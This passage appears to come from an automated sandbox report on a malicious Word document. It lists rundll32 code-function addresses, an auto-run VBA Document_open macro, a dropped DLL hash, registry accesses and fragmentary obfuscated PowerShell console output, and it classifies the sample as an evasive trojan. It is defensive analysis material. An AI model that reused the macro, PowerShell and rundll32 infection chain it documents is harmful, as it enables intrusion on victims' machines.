                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00194689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001960B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001910BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001816B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00191ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001984D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00195CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00195AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001832C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001972F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001932F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019D2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001904E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001910E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00198F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019D713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00196934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00185155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019C340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019A746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00186B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019A972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00182362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00181B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00187D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018ED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001943BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001865BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001885B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001873A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00189DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00189DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018D1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00197BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00180BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018C9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019B5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018B5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003ABC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BD45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BD099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BD2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A6134
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B6D34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B6934
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BE32D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B8F18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B531E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BD713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A6B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BA972
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B7F6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A2362
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A4152
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A5155
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BC340
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BA746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B43BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A65BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A85B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A73A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A9DAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A9DAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AD1A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B7DA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BB998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A3F9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A1B9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A7D8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AED87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AC587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BE985
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AB5F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003B7BDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A4DCA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003A0BCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003AC9C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_003BB5C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003EC83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D923C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D542D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E502C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D4C27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003EBC21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003EC014
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D8217
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E3C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D8A60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003DBC63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003ED45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E3856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D9055
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003DC652
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E10BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003DC0B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D16B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D3E9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003EB499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003ED099
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E188F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E4689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003DC485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E32F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E72F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003ED2EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E6AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E10E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E04E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E5CDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E1ED9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E84D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E5AC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D32C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003E893D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_003D6134
                      Source: ARCH_25_012021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open
                      Source: ARCH_25_012021.docOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                      Source: N49I.dll.5.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@28/8@1/5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002834DF CreateToolhelp32Snapshot,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$CH_25_012021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmpJump to behavior
                      Source: ARCH_25_012021.docOLE indicator, Word Document stream: true
                      Source: ARCH_25_012021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .3.......3.............0.......................#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ................P...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........b.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................x.j......................{.............}..v.....=......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................x.j..... {...............{.............}..v....(>......0.T...............b.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................x.j......................{.............}..v.....J......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................x.j......b...............{.............}..v.....K......0.T.............8.b.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............lx.j......................{.............}..v....(.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............lx.j..... {...............{.............}..v............0.T...............b.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............\..j.....Gb...............{.............}..v............0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....p.................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............\..j.....Gb...............{.............}..v............0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....p.................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............\..j.....Gb...............{.............}..v............0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....p.................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.T.............XDb.....(.......P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................{.............}..v....@.......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v....P.......0.T.............XDb.....$.......P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ................{.............}..v..... ......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P'......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................{.............}..v.....(......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P/......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....0................{.............}..v.....0......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P7......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....8................{.............}..v.....8......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P?......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....@................{.............}..v.....@......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....PG......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....H................{.............}..v.....H......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....PO......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....P................{.............}..v.....P......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............\..j.....Gb...............{.............}..v....PW......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....X................{.............}..v.....X......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............\..j.....Gb...............{.............}..v....P_......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....`................{.............}..v.....`......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............\..j.....Gb...............{.............}..v....Pg......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....h................{.............}..v.....h......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............\..j.....Gb...............{.............}..v....Po......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....p................{.............}..v.....p......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............\..j.....Gb...............{.............}..v....Pw......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....x................{.............}..v.....x......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.T.............XDb.....<.......P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v............0.T.............................P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....`.................{.............}..v............0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j.....Gb...............{.............}..v....0.......0.T.....................r.......P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......\..j......................{.............}..v............0.T.............XDb.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....0.......0.T..............Db.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................<}.j......................{.............}..v............0.T...............b.............P...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................<}.j....E.n...............{.............}..v....x>......0.T...............b.............P...............
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
